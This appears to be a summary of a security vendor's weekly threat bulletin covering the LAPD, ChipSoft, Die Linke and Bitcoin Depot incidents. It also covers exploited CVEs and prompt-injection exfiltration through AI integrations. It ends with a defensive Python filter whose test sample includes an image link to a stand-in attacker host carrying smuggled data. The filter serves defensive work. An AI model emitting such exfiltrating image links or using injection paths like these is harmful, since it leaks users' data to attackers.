Full Report
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, […]
The post 13th April – Threat Intelligence Report appeared first on Check Point Research.
Analysis Summary
# Incident Report: Multi-Victim Intelligence Roundup (April 13, 2026)
## Executive Summary
This intelligence report summarizes a series of high-impact cyber events including a massive data breach at the LAPD, a disruptive healthcare ransomware attack in the Netherlands, and a multi-million dollar cryptocurrency theft at Bitcoin Depot. These incidents demonstrate the continued targeting of public infrastructure and the high financial stakes of credential theft and ransomware.
## Incident Details
- **Discovery Date:** April 8 – April 13, 2026 (Reported)
- **Incident Date:** Late March – April 2026
- **Affected Organizations:** Los Angeles Police Department (LAPD), ChipSoft (Healthcare), Die Linke (Political Party), Bitcoin Depot (Crypto ATM)
- **Sector:** Government, Healthcare, Political, Finance/Crypto
- **Geography:** United States, Netherlands, Germany
## Timeline of Events
### Initial Access
- **Date/Time:** Circa late March 2026 (Die Linke); Unknown (LAPD/Bitcoin Depot)
- **Vector:** Credential theft (Bitcoin Depot); Vulnerability exploitation/Ransomware (ChipSoft/Die Linke)
- **Details:** Attackers gained access to digital asset settlement accounts for Bitcoin Depot and compromised digital storage systems for the L.A. City Attorney’s Office.
### Lateral Movement
- **Details:** In the ChipSoft incident, attackers moved through the provider's HiX platform, forcing the disconnection of multiple hospitals to prevent further spread.
### Data Exfiltration/Impact
- **LAPD:** 7.7 Terabytes of data (337,000+ files) including personnel records and internal affairs materials.
- **Bitcoin Depot:** Theft of over 50 BTC (approx. $3.6M) from company wallets.
- **Die Linke:** Shutdown of IT infrastructure; threatened leak of employee and party data.
- **ChipSoft:** Disruption of Dutch hospital operations and potential exposure of patient data.
### Detection & Response
- **Detection:** Multiple hospitals noted service disruptions; Bitcoin Depot detected unauthorized wallet transfers.
- **Response:** LAPD reported breach to authorities; ChipSoft disabled patient/provider services; Die Linke took IT infrastructure offline; Bitcoin Depot blocked further account access.
## Attack Methodology
- **Initial Access:** Credential theft (Digital Asset accounts); Phishing (for BITTER APT/Hack-for-hire).
- **Persistence:** Deployment of Android spyware (BITTER APT).
- **Lateral Movement:** Unauthorized access through integrated healthcare management platforms.
- **Collection:** Bulk scraping of digital storage systems (LAPD).
- **Exfiltration:** Direct transfer of cryptocurrency to attacker-controlled wallets.
- **Impact:** Service disruption (Healthcare/Political), financial loss (Crypto), and sensitive data exposure (Law Enforcement).
## Impact Assessment
- **Financial:** $3.6 Million+ in cryptocurrency (Bitcoin Depot).
- **Data Breach:** 7.7 TB of sensitive police records; potential healthcare records (ChipSoft); political membership/employee data.
- **Operational:** Massive disruption to Dutch hospital systems and German political infrastructure.
- **Reputational:** High-profile exposure of unredacted law enforcement personnel information.
## Indicators of Compromise
- **Network:** https://research.checkpoint.com/wp-content/uploads/2026/04/Threat_Intelligence_News_2026-04-13.pdf (this is the bulletin itself, not an attacker-controlled indicator; the network indicators are in the PDF).
- **File:** Malicious PDF lures (targeting Russian oil/gas), Android spyware disguised as messaging apps.
- **Behavioral:** Ransomware.Wins.Qilin signatures; chaining of indirect prompt injection in AI components (GrafanaGhost).
## Response Actions
- **Containment:** Disabling of the HiX healthcare platform; shutting down party IT infrastructure (Die Linke).
- **Eradication:** Blocking compromised digital asset settlement accounts (Bitcoin Depot).
- **Recovery:** Development and release of patches for CVE-2026-1340 (Ivanti) and CVE-2026-39987 (Marimo).
## Lessons Learned
- **AI as a Vector:** The emergence of "AI Agent Traps" and "GrafanaGhost" highlights that AI integrations introduce new, silent exfiltration paths that standard WAFs may miss.
- **Supply Chain Vulnerability:** The ChipSoft incident highlights the single point of failure in centralized healthcare software platforms.
- **Rapid Exploitation:** Vulnerabilities like the Marimo RCE (CVE-2026-39987) are being weaponized within hours of disclosure.
## Recommendations
- **Asset Access Control:** Implement multi-factor authentication (MFA) and hardware security modules (HSM) for all cryptocurrency settlement and high-value financial accounts.
- **Patch Management:** Prioritize patching Ivanti Endpoint Manager Mobile (EPMM) due to active exploitation of CVE-2026-1340.
- **AI Security:** Audit internal AI deployments for prompt injection vulnerabilities and ensure image URL validation is robust.
- **Data Governance:** Review and encrypt sensitive digital storage systems (such as those used by the L.A. City Attorney) to mitigate the impact of a breach.
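As an added defensive illustration of the image-URL validation recommended above (not code from the bulletin or from Check Point), the following Python filter inspects an assistant's markdown output before it is rendered, dropping image references that point outside an allowlist or carry oversized query values that could smuggle data; the allowlisted host, the length threshold and the sample response are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Deployment-specific allowlist of hosts an assistant may embed images from (assumption).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
MAX_QUERY_VALUE_LEN = 64  # longer query values are treated as possible smuggled data

# Matches markdown images ![alt](url) and HTML <img src="url"> in model output.
IMAGE_REF = re.compile(
    r'!\[[^\]]*\]\(\s*(?P<md>[^)\s]+)[^)]*\)|<img\b[^>]*\bsrc=["\'](?P<html>[^"\']+)["\']',
    re.IGNORECASE,
)

def classify_image_url(url):
    """Return None if the URL may be rendered, otherwise a short reason for blocking it."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        return "non-https scheme"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_IMAGE_HOSTS:
        return "host not allowlisted"
    params = parse_qs(parts.query, keep_blank_values=True)
    if any(len(v) > MAX_QUERY_VALUE_LEN for vals in params.values() for v in vals):
        return "oversized query value (possible data smuggling)"
    return None

def sanitize_response(markdown):
    """Strip disallowed image references from model output; return (clean_text, findings)."""
    findings = []  # list of (url, reason) for logging and detection

    def repl(match):
        url = match.group("md") or match.group("html")
        reason = classify_image_url(url)
        if reason is None:
            return match.group(0)
        findings.append((url, reason))
        return "[image removed]"

    return IMAGE_REF.sub(repl, markdown), findings

# Constructed sample: one legitimate chart, one image whose URL carries 100 bytes of
# smuggled data to a non-allowlisted host, and one plain-http reference.
SAMPLE_RESPONSE = (
    "Here is the chart: ![chart](https://cdn.example.com/chart.png)\n"
    "![x](https://attacker.example/p.gif?d=" + "A" * 100 + ")\n"
    '<img src="http://cdn.example.com/logo.png">'
)

if __name__ == "__main__":
    clean, found = sanitize_response(SAMPLE_RESPONSE)
    print(clean)
    for url, reason in found:
        print("BLOCKED:", reason, url[:60])
```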